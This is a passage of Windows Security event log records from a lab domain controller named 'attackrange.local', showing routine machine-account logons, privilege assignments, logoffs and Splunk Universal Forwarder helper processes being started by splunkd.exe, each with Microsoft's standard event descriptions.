Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263588
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72BC84
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:14:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263599
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x53c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:14:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263601
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x186c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:14:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263600
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:14:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263602
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ab0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:14:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263603
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd30
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:14:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263605
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xb94
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:14:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263604
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17e0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:14:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263606
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72BE2C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:14:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263609
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73074D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:14:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263608
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x73074D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59881
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:14:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263607
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73074D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:15:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263610
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd00
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:15:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263612
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19c4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:15:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263611
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xad0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:15:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263613
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe18
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:15:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263614
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b64
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:15:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263616
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x27c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:15:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263615
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xae0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:15:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263619
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7341BA
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:15:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263618
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7341BA
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59895
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:15:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263617
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7341BA
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:16:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263621
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a50
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
